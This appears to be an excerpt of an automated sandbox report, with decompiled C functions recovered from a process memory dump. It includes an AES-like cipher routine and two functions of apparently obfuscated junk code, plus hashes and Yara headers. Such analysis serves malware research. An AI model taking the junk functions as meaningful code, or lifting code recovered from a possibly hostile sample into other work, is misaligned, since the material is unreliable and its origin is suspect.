0x0041b5fd
0x0041b603
0x0041b60f
0x0041b615
0x0041b621
0x0041b627
0x0041b627
0x0041b627
0x0041b62d
0x0041b633
0x0041b635
0x0041b63b
0x0041b641
0x0041b647
0x0041b64d
0x0041b654
0x0041b66f
0x0041b675
0x0041b67c
0x0041b682
0x0041b683
0x0041b689
0x0041b690
0x0041b697
0x0041b6a3
0x0041b6a9
0x0041b6af
0x0041b6b5
0x0041b6b6
0x0041b6c3
0x0041b6c9
0x0041b6d0
0x0041b6d6
0x0041b6dc
0x0041b6dd
0x0041b6e0
0x0041b6e0
0x0041b6d0
0x0041b6a9
0x0041b683
0x0041b63b
0x0041b621
0x00000000

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cfadc49bc81972c395d1dd95ff69dd9a8b267152d290b290726fd46f3f369ad
Instruction ID: 5e3d81b71af50e4effaf08694533d7f049c4287bcc7215778e2bc7912dcbe270
Opcode Fuzzy Hash: 4cfadc49bc81972c395d1dd95ff69dd9a8b267152d290b290726fd46f3f369ad
Instruction Fuzzy Hash: 1C525432959390CFD716CF38D98AB813FB1F782320B08425EC9A1975D2D738256ADF89

Uniqueness

Uniqueness Score: -1.00%

Function 00402FB0, Relevance: .4, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 26%

			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}

0x00402fb0
0x00402fbf
0x00402fc8
0x00402fd6
0x00402fda
0x00402fe3
0x00402ff4
0x00402ff7
0x00402ffc
0x00403005
0x00403013
0x00403018
0x00403021
0x00403031
0x00403051
0x00403054
0x00403066
0x0040306b
0x00403080
0x0040309d
0x004030a0
0x004030b1
0x004030c6
0x004030e6
0x004030e9
0x004030fb
0x00403119
0x00403136
0x00403139
0x0040314b
0x00403160
0x00403166
0x0040316e
0x0040316f
0x00403172
0x00403180
0x00403190
0x004031a2
0x004031b4
0x004031d0
0x004031e3
0x004031f0
0x00403201
0x00403218
0x0040323a
0x0040323d
0x0040324e
0x00403269
0x00403280
0x00403283
0x00403295
0x0040329d
0x004032b2
0x004032cf
0x004032d2
0x004032e3
0x00403307
0x00403317
0x0040331a
0x0040332c
0x00403344
0x00403347
0x0040335a
0x00403367
0x00403379
0x00403391
0x004033b4
0x004033b7
0x004033c9
0x004033de
0x004033e4
0x004033e4
0x004033e7
0x004033e7
0x00403180
0x0040344b
0x00403454
0x00403462
0x004034c0
0x004034c9
0x004034d7
0x00403539
0x00403542
0x0040354f
0x00403552
0x0040359e
0x004035aa
0x004035b3
0x004035c0
0x004035c7

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 0041B6EB, Relevance: .2, Instructions: 189
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E0041B6EB() {
				signed int _t25;
				signed int _t26;
				signed char _t27;
				signed char _t28;
				signed int _t29;
				signed int _t30;
				void* _t37;
				signed int _t40;
				signed char _t41;
				intOrPtr _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				signed int _t46;
				signed int _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				void* _t55;
				void* _t57;
				intOrPtr _t59;
				signed int _t60;

				_t26 = _t25 &  *0xf6a8aae9;
				 *0xd665b7ba =  *0xd665b7ba | _t29;
				asm("sbb [0x7744ded0], bh");
				 *0x28b8098d =  *0x28b8098d | _t41;
				_t46 = _t57 + 1;
				_push(_t50);
				_t30 = _t29 ^  *0x5d6fbbf5;
				 *0x22b2c50b =  *0x22b2c50b >> 0x1d;
				_push(_t30);
				 *0x3352c0c9 =  *0x3352c0c9 ^ _t30;
				 *0xbf5013f =  *0xbf5013f >> 0x26;
				asm("adc [0x8a7c1484], al");
				_push(_t26);
				_t27 = _t26 ^  *0x3f325516;
				 *0x185b9914 =  *0x185b9914 & _t41;
				_t38 = _t37 + 1;
				if(_t38 >= 0) {
					__ebp = __ebp & 0x8a68e470;
					__ebx = __ebx ^  *0xecea90e;
					 *0x9644a527 =  *0x9644a527 ^ __edx;
					__eflags =  *0x9644a527;
					_push(__edi);
					if( *0x9644a527 <= 0) {
						__ebx =  *0x2e8bc7f * 0x8a90;
						__dh = __dh | 0x00000012;
						asm("sbb [0x9d8651db], edi");
						asm("sbb esp, [0xd189979c]");
						 *0x3918ca9f =  *0x3918ca9f ^ __edx;
						__esp = __esp + 1;
						asm("sbb ch, 0x3a");
						__edi = __edi |  *0x1abe753f;
						__eflags =  *0xf2696312 & __dh;
						 *0xe52f802d =  *0xe52f802d | __ebp;
						__cl = __cl - 0xc9;
						__ebp =  *0x9f02b36b * 0x1b99;
						__edi = __edi - 0x1abf6a0d;
						__ebx =  *0x2e8bc7f * 0x8a90 -  *0x2c0d700d;
						__edx = __edx + 1;
						__eflags =  *0x5ccc4766 & __ebp;
						asm("sbb esi, [0xdc461e8f]");
						__bl = __bl | 0x00000018;
						asm("rcl byte [0x2aaea810], 0xbd");
						_push(__esi);
						 *0xc155d6d5 =  *0xc155d6d5 << 0xee;
						__eflags = __esi -  *0xce38f68b;
						__esi = __esi &  *0x1a31e299;
						__ecx = __ecx ^  *0xccd27a07;
						__al = __al ^ 0x000000f2;
						asm("movsw");
						__esi =  *0x9009b96b * 0x2ce7;
						__eflags = __edx;
						if(__eflags >= 0) {
							__edx =  *0x960a5d72;
							if(__eflags >= 0) {
								__eax =  *0xab1cf17c * 0x52b6;
								asm("adc esp, [0x17376f39]");
								_push( *0x6214ac68);
								__bl = __bl - 0xe0;
								__eflags = __bl;
								__ebx =  *0x32e2f1fc;
								if(__bl < 0) {
									__esp =  *0x1b49ec79;
									__ebp = __ebp - 1;
									asm("ror dword [0xbe210895], 0x7");
									 *0x5765053a & __cl = __ebx & 0x30cfea1b;
									_pop(__edi);
									__al = __al |  *0x5fa4e310;
									__al = __al &  *0xc6e75528;
									__ebx = __ebx ^  *0x341b75bd;
									__eflags = __ebp -  *0x67f6440f;
									asm("sbb [0xf77c969b], ebp");
									__ebp = __ebp | 0x92128d98;
									__ebx =  *0xafb4806a * 0xb2b0;
									 *0xfb9ff5ff =  *0xfb9ff5ff << 0x5c;
									__esp =  *0x9a95d76a * 0xe7d0;
									 *0xb2ed4b1a =  *0xb2ed4b1a >> 0x7b;
								}
							}
						}
					}
				}
				L1:
				 *0x42f27d09 =  *0x42f27d09 & _t27;
				_pop(_t54);
				 *0xa8b2480d =  *0xa8b2480d - _t38;
				 *0xcb78af10 =  *0xcb78af10 | _t30 - 0x00000001;
				_t53 =  *0x59d8e1de;
				 *0x59d8e1de = _t54;
				_t28 = _t27 + 1;
				asm("sbb edx, [0xc234c5dc]");
				asm("adc al, [0x2d236f08]");
				 *0xa00b8c9f = _t50;
				asm("sbb [0xab205d4], esi");
				 *0xd656ff4 =  *0xd656ff4 - _t46;
				_t40 =  *0xbbf37a6a * 0x0000a46f & 0x00000034;
				 *0x11dac03b =  *0xa00b8c9f;
				asm("sbb edx, [0x10308efc]");
				 *0x55f51ae6 = _t28;
				asm("adc edx, 0xc5c0b806");
				 *0xab3eb3e1 =  *0xab3eb3e1 << 0x7b;
				_t27 = _t28 |  *0xe85923c;
				 *0xcbcd0d10 =  *0xcbcd0d10 + _t40;
				_t50 =  *0x11dac03b -  *0x76f78dbd;
				_t42 =  *0x114a19c4;
				 *0xe0f90a1a =  *0xe0f90a1a << 0xcb;
				 *0x977a7cf5 = _t42;
				asm("sbb bl, 0x10");
				 *0x5db083b5 =  *0x5db083b5 >> 0x89;
				_t46 =  *0xc89c2513 - 1 -  *0x5c090605;
				_t43 = _t42 +  *0x9ce3c297;
				asm("adc ah, [0x9c69a888]");
				_t38 = _t40 & 0xfaa20a37;
				_t59 =  *0xdc393f39;
				_t30 =  *0x3aeb780f;
				 *0x3aeb780f = 0x379d699f;
				asm("sbb [0xa46d4c0c], ah");
				asm("movsw");
				if( *0x930ef682 < _t38) {
					_t44 = _t43 +  *0x12982871;
					 *0xde05d010 = _t38;
					 *0xa1360fc6 =  *0xa1360fc6 >> 0x42;
					_t38 = _t38 + 1;
					_t60 = _t59 +  *0x343ab42b;
					asm("cmpsw");
					 *0x5836ae1f =  *0x5836ae1f << 0x21;
					asm("sbb [0x5fe47d30], ah");
					_t55 = _t53 +  *0x9987d86f;
					_push(_t55);
					_t30 =  *0x5f4eba6a * 0xb08d;
					_t27 =  *0x62128164;
					_t53 = _t55 +  *0xbe14c8ef;
					 *0x7eb1d28c =  *0x7eb1d28c & _t60;
					asm("adc [0x896bf326], ecx");
					_t50 = _t50 & 0xc7e434c0;
					if((_t38 & 0x2d837067) >= 0) {
						_t15 = _t30;
						_t30 =  *0xb07b6372;
						 *0xb07b6372 = _t15;
						_t27 = _t27 +  *0x73435a2e;
						_t38 = 0xc;
						_t45 = _t44 +  *0xa897ad0a;
						if(_t45 == 0) {
							 *0x8bf27675 =  *0x8bf27675 + _t46;
							asm("sbb esi, [0xb9b1f4d6]");
							asm("rcr dword [0x41a58989], 0x5");
							_push( *0x41dfbf);
							 *0x66b2930b =  *0x66b2930b | 0x0000000c;
							_push(_t60);
							asm("adc esp, [0x33d91f95]");
							_t53 = _t53 -  *0x789c2168 + 1;
							if(_t53 < 0) {
								asm("rcl dword [0xf0035473], 0x3c");
								asm("rcl byte [0x153c973a], 0xf7");
								asm("sbb [0xd9607493], esp");
								 *0x9256bfd4 =  *0x9256bfd4 ^ _t50;
								if( *0x9256bfd4 >= 0) {
									_push( *0xd70fc778);
									_push(_t60);
									 *0xb1314a0 =  *0xb1314a0 >> 0xba;
									_t53 = _t53 -  *0xcfdb8fc1;
									 *0x16ecee1b =  *0x16ecee1b >> 0xf0;
									if(_t53 < 0) {
										 *0x50c82171 =  *0x50c82171 ^ _t46;
										_push(_t45);
										_t38 = 0x1e;
										_t30 = _t30 -  *0x707b0687;
									}
								}
							}
						}
					}
				}
				goto L1;
			}

0x0041b6eb
0x0041b6f1
0x0041b6f7
0x0041b6fe
0x0041b705
0x0041b706
0x0041b707
0x0041b70d
0x0041b714
0x0041b715
0x0041b71b
0x0041b722
0x0041b728
0x0041b729
0x0041b73b
0x0041b741
0x0041b742
0x0041b748
0x0041b74e
0x0041b754
0x0041b754
0x0041b75a
0x0041b75b
0x0041b761
0x0041b76b
0x0041b76e
0x0041b774
0x0041b77a
0x0041b780
0x0041b781
0x0041b784
0x0041b78a
0x0041b790
0x0041b796
0x0041b799
0x0041b7a3
0x0041b7a9
0x0041b7af
0x0041b7b0
0x0041b7b6
0x0041b7bc
0x0041b7bf
0x0041b7c6
0x0041b7c7
0x0041b7ce
0x0041b7d4
0x0041b7da
0x0041b7e0
0x0041b7e2
0x0041b7e4
0x0041b7ee
0x0041b7f4
0x0041b7fa
0x0041b800
0x0041b806
0x0041b810
0x0041b816
0x0041b81c
0x0041b81c
0x0041b81f
0x0041b825
0x0041b82b
0x0041b831
0x0041b832
0x0041b840
0x0041b846
0x0041b847
0x0041b84e
0x0041b854
0x0041b85a
0x0041b860
0x0041b866
0x0041b86c
0x0041b876
0x0041b87d
0x0041b887
0x0041b887
0x0041b825
0x0041b800
0x0041b7f4
0x0041b75b
0x0041b4a6
0x0041b4a6
0x0041b4b3
0x0041b4b4
0x0041b4ba
0x0041b4c0
0x0041b4c0
0x0041b4d6
0x0041b4d7
0x0041b4dd
0x0041b4e3
0x0041b4e9
0x0041b4ef
0x0041b4f5
0x0041b4f8
0x0041b4fe
0x0041b510
0x0041b516
0x0041b51c
0x0041b523
0x0041b529
0x0041b535
0x0041b53b
0x0041b541
0x0041b548
0x0041b54e
0x0041b55e
0x0041b565
0x0041b571
0x0041b577
0x0041b57d
0x0041b583
0x0041b58f
0x0041b58f
0x0041b59b
0x0041b5a1
0x0041b5a3
0x0041b5a9
0x0041b5b5
0x0041b5bb
0x0041b5c2
0x0041b5cc
0x0041b5d2
0x0041b5d4
0x0041b5db
0x0041b5e1
0x0041b5ed
0x0041b5ee
0x0041b5f8
0x0041b5fd
0x0041b603
0x0041b60f
0x0041b615
0x0041b621
0x0041b627
0x0041b627
0x0041b627
0x0041b62d
0x0041b633
0x0041b635
0x0041b63b
0x0041b641
0x0041b647
0x0041b64d
0x0041b654
0x0041b66f
0x0041b675
0x0041b67c
0x0041b682
0x0041b683
0x0041b689
0x0041b690
0x0041b697
0x0041b6a3
0x0041b6a9
0x0041b6af
0x0041b6b5
0x0041b6b6
0x0041b6c3
0x0041b6c9
0x0041b6d0
0x0041b6d6
0x0041b6dc
0x0041b6dd
0x0041b6e0
0x0041b6e0
0x0041b6d0
0x0041b6a9
0x0041b683
0x0041b63b
0x0041b621
0x00000000

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a58f26f02b3d6619eb4a9f1a3b64905e487c5c69784152f1e8062b583c6260e9
Instruction ID: 25f4504eeba9ea1a2c0826ad8822b515979580c424574b3b329e80eb99d6e546
Opcode Fuzzy Hash: a58f26f02b3d6619eb4a9f1a3b64905e487c5c69784152f1e8062b583c6260e9
Instruction Fuzzy Hash: A5917532908394CFD706DF34C9C6B923FB5F782324B05424ED9A553592D338226ACF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041CBB7, Relevance: .2, Instructions: 172
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E0041CBB7(signed int __eax, signed char __ebx, signed char __edx, signed int __esi, char _a568098435) {
				signed int _t25;
				signed int _t27;
				signed char _t28;
				void* _t29;
				signed char _t34;
				signed char _t35;
				signed int _t43;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				signed int _t50;
				void* _t53;
				signed int _t54;
				signed int _t55;
				void* _t56;
				intOrPtr _t59;
				intOrPtr _t64;
				void* _t65;
				void* _t66;

				_t50 = __esi;
				_t39 = __edx;
				_t28 = __ebx;
				_t25 = __eax;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									do {
										do {
											do {
												do {
													do {
														do {
															do {
																do {
																	L1:
																	_t28 = _t28 & 0x000000f2;
																	 *0x21a8f022 =  *0x21a8f022 & _t39;
																	_t50 = _t50 -  *0x545acbcb;
																} while (_t50 != 0);
																_t59 =  *0xc2bbf175;
																 *0x8eafe1dd =  *0x8eafe1dd >> 0x2f;
																 *0x1e848e36 =  *0x1e848e36 | _t25;
																_pop(_t53);
																asm("rcr byte [0xd3aa0d2a], 0xf1");
																asm("sbb ah, [0x9aa43904]");
															} while ( *0x1e848e36 != 0);
															asm("ror byte [0x8a7ab7f6], 0x3a");
															asm("rcl dword [0xd08fc9ba], 0xeb");
															asm("sbb [0x6ef4230a], dh");
														} while (_t59 +  *0xa18e7b7b >= 0);
														asm("adc [0xa42ce8e0], dh");
														asm("rcr dword [0x1a2364dd], 0xae");
														asm("ror byte [0x2c0a38e5], 0x1f");
														 *0x661baaf7 =  *0x661baaf7 + _t50;
														_t25 = _t25 | 0x000000b3;
													} while (_t25 > 0);
													 *0x82e0cd77 =  *0x82e0cd77 << 0x2b;
													_t25 = _t25 ^  *0x1cb3c70d;
													_t34 =  *0xf22f1a6a * 0x11ae;
													_t50 = _t50 ^  *0xde5c4e21;
													_t39 = _t39 ^  *0x30fa83b6;
													asm("stosd");
												} while (_t39 < 0);
												_push( *0xa03b6072);
												asm("adc edx, 0xc1d0730f");
												_t50 = _t50 | 0xd6ae86a9;
												 *0x636b55d1 =  *0x636b55d1 << 0x4a;
												 *0x6dd51df7 =  *0x6dd51df7 - _t53;
												 *0xfaffdce4 =  *0xfaffdce4 >> 0xb1;
												 *0x906cd1db =  *0x906cd1db ^ _t34;
												 *0x688d3a13 =  *0x688d3a13 >> 0x78;
												 *0xdf8d0d2b =  *0xdf8d0d2b + _t25;
												 *0x932ab912 =  *0x932ab912 >> 0xa5;
											} while ( *0xdf8d0d2b <= 0);
											_t54 =  *0x7240587e * 0x47d6;
										} while (_t54 >= 0);
										_t25 = _t25 + 0xbaf42b71;
									} while (_t25 != 0);
									_pop(_t29);
									asm("cmpsb");
									 *0x36eefb3f =  *0x36eefb3f ^ _t39;
									_t27 =  *0xe9bbe6eb;
									asm("ror byte [0x9012cd0c], 0xa9");
									 *0xbb63569e =  *0xbb63569e >> 0xf;
									 *0x694c8117 =  *0x694c8117 >> 0x1e;
									 *0x27ffd2fa = _t50;
									_t35 = _t34 |  *0x9ed8e3a;
									 *0x618e8f0f =  *0x618e8f0f ^ _t27;
									_t39 = 0xb6;
									_t55 = _t54 ^ 0xe28a2131;
									asm("rcl dword [0x10ca9613], 0x9f");
									_t28 = _t29 - 0xa2;
									 *0xaaf2366e =  *0xaaf2366e - 0xb6;
									_t25 = _t27 + 1;
								} while (_t25 > 0);
								 *0xb9329c77 =  *0xb9329c77 >> 0xd4;
								 *0x27cdc91c =  *0x27cdc91c - _t25;
								_pop( *0x10dbc66f);
								asm("adc ch, 0xf2");
								asm("movsw");
								_t25 = _t25 + 1;
								_push(_t55);
								_t64 =  *0x6ef8218d;
								asm("sbb dl, 0x8a");
								asm("sbb esp, 0x3dde110d");
								_push(_t50);
								asm("sbb cl, [0xe523a304]");
								_push(_t35);
								asm("sbb esi, [0xa71fc4cd]");
								 *0x68555324 =  *0x68555324 & 0x000000b6;
								asm("sbb bh, 0x24");
								asm("rcl byte [0x6c32e28a], 0x33");
								 *0xe4f35fff = _t35;
								 *0x8fac4809 =  *0x8fac4809 >> 0x5e;
								_t65 = _t64 +  *0x33b777ea;
								_t56 = _t64;
								 *0x149c0815 =  *0x149c0815 & _t50;
								 *0xeafa1182 = 0xb6;
								asm("rol dword [0x8e315aa1], 0x64");
								_push(_t50);
								_push( *0x29119335);
								 *0xef657a31 =  *0xef657a31 >> 0x5c;
								 *0xc8cf91d1 =  *0xc8cf91d1 - _t28;
								_t43 =  *0x9995e46a * 0xc6a3;
								_t50 = _t50 ^ 0xe8dd6533;
								asm("adc edx, [0x7b709068]");
								 *0xd4535def = _t43;
								_t28 =  *0xd192d5ed;
								_push( *0x67cfe1f5);
								 *0x61eac132 = 0xb6;
								asm("adc ebx, 0xd12ae5ba");
								 *0x78df780a =  *0x78df780a ^ _t28;
								_t39 = (0x000000b6 &  *0xd42ca5c8) - 1;
							} while (_t39 >= 0);
							 *0xc9fc9393 =  *0xc9fc9393 - _t56;
							asm("sbb [0x2103eb0], dh");
							asm("adc ebp, 0xef02743d");
							_t45 = _t43 ^  *0xccbfb9da | 0x2eb38296;
							_t39 = _t39 +  *0x399bd073 |  *0xc8b82ee2;
							 *0xc54970ef =  *0xc54970ef >> 0xcf;
							asm("sbb ah, 0xb0");
						} while ( *0x7482b0de >= _t65);
						_t46 = _t45 ^  *0x33a7471;
						 *0x1447bf26 =  *0x1447bf26 + _t56;
						asm("rol dword [0xdcf571d4], 0x20");
						_t66 = _t65 - 0xdd223ff3;
						_t24 = _t39;
						_t39 =  *0xc055ac02;
